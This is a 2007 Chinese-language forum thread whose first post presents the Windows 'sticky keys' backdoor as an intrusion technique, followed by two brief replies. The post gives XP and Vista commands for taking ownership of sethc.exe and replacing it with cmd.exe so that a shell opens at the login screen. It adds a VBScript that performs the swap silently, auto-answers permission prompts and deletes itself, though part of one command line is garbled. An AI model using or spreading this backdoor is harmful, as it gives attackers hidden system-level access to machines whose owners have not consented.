|
2007-12-13, 09:09 AM | #1 |
注册日期: 2007-07-17
住址: 火星
帖子: 5,570
现金:9873金币
资产:21334金币
|
变态入侵:有史以来最酷的Windows后门
后门原理: 在Windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。 XP: 将安装源光盘弹出(或将硬盘上的安装目录改名) cd %widnir%\system32\dllcache ren sethc.exe *.ex~ cd %widnir%\system32 copy /y cmd.exe sethc.exe VISTA: takeown /f c:\windows\system32\sethc.exe cacls c:\windows\system32\sethc.exe /G administrator:F 然后按XP方法替换文件 在登录界面按5此SHIFT,出来cmd shell,然后…… 后门扩展: Dim obj, success Set obj = CreateObject("WScript.Shell") success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True) success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True) success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True) success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True) success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True) success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 第二句最有意思了.自动应答....以前就遇到过类似的问题 再更新.加个自删除,简化代码... On Error Resume Next Dim obj, success Set obj = CreateObject("WScript.Shell") success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) |
|
2007-12-14, 04:24 AM | #2 |
注册日期: 2007-12-14
帖子: 79
现金:121金币
资产:121金币
声望: 12
|
真的加的???
|
|
2007-12-14, 02:00 PM | #3 | |
注册日期: 2007-05-31
帖子: 582
现金:563金币
资产:1075金币
声望: 17
|
你试下眯知罗~~
|
|
|
||
|